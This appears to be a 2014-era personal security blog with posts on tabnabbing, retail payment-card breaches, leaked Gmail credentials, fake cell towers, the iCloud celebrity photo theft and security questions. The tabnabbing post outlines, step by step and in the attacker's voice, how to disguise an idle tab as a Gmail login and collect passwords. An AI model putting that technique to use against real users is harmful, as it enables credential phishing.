Tabnabbing Attacks

The dangers of having too many tabs open.

How The Attack Works

  1. A user navigates to your normal looking site.
  2. You detect when the page has lost its focus and hasn’t been interacted with for a while.
  3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.
  4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.
  5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

Aza Raskin’s Tabnapping is a proof-of-concept for a fiendish attack: a tab that waits until you’re not watching, then turns itself into a convincing Google login screen that you assume you must have opened.

Actually, it’s even sneakier: it can use CSS-based analysis to figure out which websites you login to, and then can use cross-site scripting to reload a different tab — another one that you’re not looking at — to turn itself into a convincing login screen.

To see it in action, check out Aza Raskin’s site, then navigate away in another tab for a little.

Posted in Security Blog | Tagged , , , , , , | Comments Off on Tabnabbing Attacks

Goodwill/C&K Systems

Back when I posted about the 868,000 Payment Cards, 330 Stores, it was recently revealed that the exposure was due to C&K Systems.

All 20 previously affected Goodwill members have stopped using C&K Systems to process customers’ payment cards… Earlier this month, Goodwill said the breach stemmed from malware known as RAW.PoS, which was used to compromise a third-party vendor. Information exposed in the breach includes names, payment card numbers and expiration dates.

While details on the attack on C&K Systems are scarce, two security experts say it’s possible the compromise was the result of a remote-access attack.

There is an ever-present possibility that criminals are favoring remote access-type attacks because the log-in credentials needed to access the databases and/or hardware are elements that could easily be obtained through phishing or social engineering, something that is easy to remedy with security awareness training.

Posted in Security Blog | Tagged , , , , , , , , , | Comments Off on Goodwill/C&K Systems

Gmail Passwords Posted

4929090 gmail email addresses and passwords were posted online as a result of phishing and weak website database compromise. This site can be used to check to see if your email address is on the list. Regardless if your email address is on the list, you should change your password regularly.

isleaked

Posted in Security Blog | Tagged , , , , , , , | Comments Off on Gmail Passwords Posted

Home Depot Breach

homedepot

Home improvement retailer Home Depot confirms its payment security systems fell victim to a massive cyber attack, possibly since April, at nearly 2,200 stores in the U.S. and Canada.

Fishnet Security, Symantec, and the Secret Service are working to research all behind the breach and what and who all was affected.

According to a person close to the investigation, more than 60 million credit card numbers may have been stolen from Home Depot’s payment system. Comparatively, hackers stole data for over 40 million cards from Target’s system following a three-week attack during the busy Black Friday shopping season.

Home Depot has assured customers they won’t be responsible for any fraudulent charges on their credit or debit cards and has promised to offer free identity-protection services, including credit monitoring. So far, banks have not yet alerted customers to potential fraud.

Home Depot’s cybersecurity system is ranked behind that of other retailers. According to this report, Home Depot takes 1.3 days to clear malware from its system, lagging behind the retail industry average of one day. Online discussions of vulnerabilities on Home Depot’s website date back to 2008. These revelations raise serious concerns about Home Depot’s responsiveness to potential attacks, particularly in light of other retailers that have recently been targeted by hackers.

Two senators asked the federal government to investigate a data breach on the payment-card processing systems of Home Depot Inc.

Posted in Security Blog | Tagged , , , , , , , , | Comments Off on Home Depot Breach

Cyber Risk & Internet of Things

I made this video for work, but modified it a bit so it’s not directly work related, but I didn’t edit the audio… Don’t hate! It’s my first one.

The intended audience is for those who don’t think with a risk mindset. Hopefully it raises awareness about the simple things in life, that seem very cool, that can be scary and even dangerous if precautions are not taken.

Posted in Security Blog | Tagged , , , , , , , , , , , , , , | Comments Off on Cyber Risk & Internet of Things

Fake Cell Phone Towers & CryptoPhone

Seventeen fake cellphone towers were discovered across the U.S. last week. They were discovered by using the CryptoPhone, an Android-based secure mobile phone with 360° mobile device security for secure messaging and voice over IP communication on any network.

esdmap

“What we find suspicious is that a lot of these interceptors are right on top of U.S. military bases. So we begin to wonder – are some of them U.S. government interceptors? Or are some of them Chinese interceptors?” says Goldsmith. “Whose interceptor is it? Who are they, that’s listening to calls around military bases? Is it just the U.S. military, or are they foreign governments doing it? The point is: we don’t really know whose they are.” -Les Goldsmith

What does that mean for the average person? It means you are being spied upon, whether you like it or not, if you carry your phone with you. To what extent? It is hard to tell. Why? We have no idea why. What’s at risk? Everything your phone knows about you.

Read more here at Popular Science

Posted in Security Blog | Tagged , , , , , , , | Comments Off on Fake Cell Phone Towers & CryptoPhone

868,000 Payment Cards, 330 Stores

30-05_goodwill
Goodwill’s investigation revealed that malware had been installed on a third-party vendor system used by 10% of its franchised stores to process credit cards. Twenty of Goodwill’s 158 regional headquarters in the United States were impacted by the breach, because of the shared third-party system.

This link has the locations of Goodwill stores affected.

Posted in Security Blog | Tagged , , , , , , | Comments Off on 868,000 Payment Cards, 330 Stores

Nude Celebs (The Fappening) !!! and Password Recovery

Nude Jennifer Lawrence… Sorta.

Apple says that the mass theft of nude celebrity photos (Dubbed, the Fappening) that were released over the weekend did not occur because of a breach in any Apple systems, including iCloud. Apple also says that Find my iPhone was not involved in the photo thefts.

Based on an analysis of the metadata from leaked photos of Kate Upton, it is determined that the photos came from a downloaded backup that would be consistent with the use of iBrute and Elcomsoft Phone Password Breaker (EPPB).

Another way that many accounts are compromised are by using a password recovery website that prompts for out of wallet questions.
Here are some examples of out of wallet questions:

  • What is your favorite sport?
  • What is your favorite vacation spot?
  • What was the make of the first car you owned?
  • What is your favorite hobby?
  • What do you like to do to relax?
  • What is your primary frequent flyer number?
  • What is your library card number?
  • What was your first phone number?
  • What was your first teacher’s name?
  • What is your father’s middle name?
  • What is the name of your favorite celebrity?
  • What is your favorite food?
  • What is the name of your favorite city?
  • What is your favorite animal?
  • What is your mother’s maiden name?
  • What is your favorite 5-digit number?
  • What are the last 5 digits of your favorite credit card?
  • What are the last 5 digits of your driver’s license number?
  • What are the last 5 digits of your vehicle identification number?
  • What are the last 5 digits of your employee ID number?
  • What are the last 5 digits of your Social Security number?
  • What City were you born in?
  • What is your shoe size?
  • How many bedrooms does your house have?
  • Where does your nearest sibling live?
  • What’s your drink of choice?
  • What color are the towels in your personal bathroom?
  • What is your ideal weight, in your view?
  • What is the last name of the author of the best book you ever read?
  • What is your favorite musical performer?
  • What is your brother’s/sister’s middle name?
  • What is your favorite game?
  • What was your nickname in high school/college?
  • How many miles do you live from work?
  • What is your favorite song?
  • What are the first five letters of your favorite song title? (Could also be a movie.)
  • What is your cell phone number? (No directories for this and you get another contact means. With number portability this should improve.)
  • What is your favorite feature about yourself? (A little invasive perhaps, but people like talking about themselves. The answer would need to be concise.)
  • How many siblings do you have?
  • What is your favorite word?
  • What is your Grandmother’s maiden name?
  • What was the town/City of grandfather’s birth?
  • What is the name of your favorite non-chain restaurant?
  • What is the pet name you gave your first car?
  • What is your favorite color?

The big thing to remember when setting up your answers, is that there is no fact checking attached to these, thus, it is possible to answer untrue answers to every one of these questions and would be attackers would go ahead and research all your publicly available information to find and use the real answers to try to get your password reset and have access to your account.

Posted in Security Blog | Tagged , , , , , , | Comments Off on Nude Celebs (The Fappening) !!! and Password Recovery

Should We Buy Credit Monitoring Services?

With the ton of breaches that have been happening, we use one of the credit monitoring services, after this year though and all the breaches going on, one of the first services that is offered to potential victims, is credit monitoring.

In the recent news since my last posting, the following have been compromised

Posted in Security Blog | Tagged , , , , , , , , , , , , , | Comments Off on Should We Buy Credit Monitoring Services?

Damien is 18!!!1!

Damien the Surfer

I can’t believe I had this guy 18 years ago! Happy birthday Damien!

20140901_175240
We celebrated his birthday yesterday on labor day, at his favorite restaurant, then came home for some ice-cream cake. Since Damien is a licensed driver and a full time student, for his birthday present, we put him on our insurance, and explained to him insurance/registration/title, etc.

Posted in life | Comments Off on Damien is 18!!!1!